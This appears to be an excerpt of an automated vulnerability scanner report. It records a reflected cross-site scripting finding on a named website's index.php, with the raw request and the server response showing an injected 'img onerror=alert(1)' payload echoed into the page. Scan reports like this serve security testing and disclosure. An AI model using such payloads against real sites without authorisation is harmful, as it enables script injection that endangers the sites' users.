1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.mister-wong |
Path: | /index.php |
GET /index.php3751b"><img%20src%3da Host: www.mister-wong.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 00:36:30 GMT Server: Apache Set-Cookie: wongsess=15403938fd0 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 5394 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="main" class="c_index.php3751b"><img src=a onerror=alert(1) ...[SNIP]... |